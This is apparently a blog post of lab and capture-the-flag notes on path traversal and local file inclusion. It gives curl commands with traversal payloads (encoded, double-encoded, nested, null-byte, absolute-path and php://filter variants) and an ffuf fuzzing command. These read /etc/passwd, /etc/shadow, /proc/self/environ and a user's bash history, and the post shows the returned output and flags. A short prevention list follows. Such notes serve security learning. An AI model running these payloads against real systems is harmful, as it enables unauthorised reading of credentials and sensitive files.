Post

Path Traversal

Posted Updated
Preview Image
By
3 min read
Path Traversal

Path Traversal

Path traversal is also known as directory traversal. These vulnerabilities enable an attacker to read arbitrary files on the server that is running an application.

  • Env Variables.
  • Running program details.
  • Application code and Data.
  • Credentials for back-end systems.
  • Sensitive operating system files.

Reading arbitrary files via path traversal

Most Common way ( File path traversal, simple case)

1
2
3
4
5

[Original]
curl -s https://0a42008e046aadb78126bbdb001f000c.web-security-academy.net/image?filename=50.jpg 

[Final]
curl -s https://0a42008e046aadb78126bbdb001f000c.web-security-academy.net/image?filename=../../../../etc/passwd

Common obstacles to exploiting path traversal vulnerabilities

Attackers frequently overcome these obstacles through:

URL Encoding

Using encoded sequences like %2e%2e%2f or double-encoded %252e%252e%252f to bypass basic filters.

1
2
3
4
5
6
7
8
9
10
11
12
13

[1 way]

..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

URL Encoding it :-
curl -s https://0a610034030cdad383a16e4f00640069.web-security-academy.net/image?filename=%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%65%74%63%25%32%66%70%61%73%73%77%64


[2 way]

..%252f..%252f..%252fetc/passwd

curl -s https://0a610034030cdad383a16e4f00640069.web-security-academy.net/image?filename=..%252f..%252f..%252fetc/passwd

Absolute Paths

Directly referencing sensitive files from the root (e.g., /etc/passwd) to avoid using traversal sequences entirely. 

1

curl -s https://0aa6006804a1ad708104c0fb000d004e.web-security-academy.net/image?filename=/etc/passwd

Nested Sequences

Utilizing patterns like ....// which simplify to ../ when inner sequences are stripped. 

1

curl -s https://0a18008703e9344681ad8eec005a0015.web-security-academy.net/image?filename=....//....//....//....//....//....//....//....//etc/passwd

Null Byte Injection

Appending null bytes (e.g., ../../../etc/passwd\u0000.png) to truncate the file path before a required extension. 

1
2
3

curl -s https://0a34003d04a2c03680542bcf00a30033.web-security-academy.net/image?filename=../../../../../../../etc/passwd%00.jpg

curl -s https://0a34003d04a2c03680542bcf00a30033.web-security-academy.net/image?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.jpg

Path Traversal Through Expected base folder

like this base folder path filename=/var/www/images/../../../etc/passwd

1
2
3
4
5

curl -s https://0aad00890367da0583fa78b400030033.web-security-academy.net/image?filename=/var/www/images/../../../../etc/passwd

curl -s https://0aad00890367da0583fa78b400030033.web-security-academy.net/image?filename=/var/fwww/images/..%2f..%2f..%2f..%2fetc%2fpasswd

curl -s https://0aad00890367da0583fa78b400030033.web-security-academy.net/image?filename=%2fvar%2fwww%2fimages%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Non-Standard Encodings

Exploiting overlong UTF-8 encodings or non-standard characters like ..%c0%af that decoders may interpret differently. 

How to prevent a path traversal attack

Additional Measures: Store sensitive files outside the web root, disable directory listings, and keep software and dependencies updated.

  • Input Validation & Whitelisting
  • Canonicalize and Validate the Path
  • Principle of Least Privilege
  • Avoid Direct User Input

Practical Examples

Example 1

Simple LFI

1
2
3
4
5
6
7
8
9
10
11
12
13

curl -sI $URL    (s=silent and I=Read Headers)
After seen the Headers it redirect to location: /page?name=home.html

> curl -s https://google.io/page?name=/etc/passwd
> curl -s https://google.io/page?name=/etc/shadow
> curl -s https://google.io/page?name=/proc/self/environ

PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
HOSTNAME=feabaa3efac2FLAG=flag{cb76c013f6984fb8d96d2df5602e10e1}
LANG=C.UTF-8GPG_KEY=A035C8C19219BA821ECEA86B64E628F8D684696D
PYTHON_VERSION=3.11.15
PYTHON_SHA256=272179ddd9a2e41a0fc8e42e33dfbdca0b3711aa5abf372d3f2d51543d09b625
HOME=/root

Example 2

FUZZING LFI Files

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

Web site will allow to see this file auth.log , deloy.log , view.log , error.log or etc...

https://google.io/logs/view?file=file_name

FUZZ it!
ffuf -u https://google.io/logs/view?file=FUZZ -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -fw 5560 

> %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
> %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/shadow
> %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fproc/self/environ

PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
HOSTNAME=9c6aa57b4f36FLAG=flag{7deb95a825f7b16a66583df98912c6a8}
LANG=C.UTF-8
GPG_KEY=A035C8C19219BA821ECEA86B64E628F8D684696D
PYTHON_VERSION=3.11.15
PYTHON_SHA256=272179ddd9a2e41a0fc8e42e33dfbdca0b3711aa5abf372d3f2d51543d09b625
HOME=/root

Example 3

Apply PHP Wrappers to Read local files

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

Found LFI in dowloading an file   download.php?file=file_name

> curl "http://app.google.io/download.php?file=....//....//....//etc/passwd"
Invalid file path.  
> curl "http://app.google.io/download.php?file=..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00"
<br />
<b>Fatal error</b>:  Uncaught ValueError: readfile(): Argument #1 ($filename) must not contain any null bytes in /var/www/html/download.php:33
Stack trace:
#0 /var/www/html/download.php(33): readfile('..2f..2f..2f..2...')
#1 {main}
  thrown in <b>/var/www/html/download.php</b> on line <b>33</b><br />

[PHP Wrappers]
> curl "http://app.google.io/download.php?file=php://filter/read=convert.base64-encode/resource=/etc/passwd" | base64 -d 

Reading locl files (index.php, download.php)
> curl "http://app.google.io/download.php?file=php://filter/read=convert.base64-encode/resource=index.php" | base64 -d 

require_once __DIR__ . '/src/config.php';   <--stored website config
require_once __DIR__ . '/src/Database.php'; <--stored db config
require_once __DIR__ . '/src/Auth.php';
require_once __DIR__ . '/src/Router.php';
require_once __DIR__ . '/src/helpers.php';


> cat passwd| grep -i 'sh$'                                                                                                  
root:x:0:0:root:/root:/bin/bash
eric:x:1001:1001::/home/eric:/bin/bash

[Reading local files for eric user]:-
> curl "http://app.google.io/download.php?file=php://filter/read=convert.base64-encode/resource=/home/eric/bash_history" | base64 -d 

> curl "http://app.google.io/download.php?file=php://filter/read=convert.base64-encode/resource=/home/eric/flag.txt" | base64 -d 
flag{php_f1lt3r_3r1c_h0m3_lf1}
Web Exploitation
path-traversal traversal
This post is licensed under CC BY 4.0 by the author.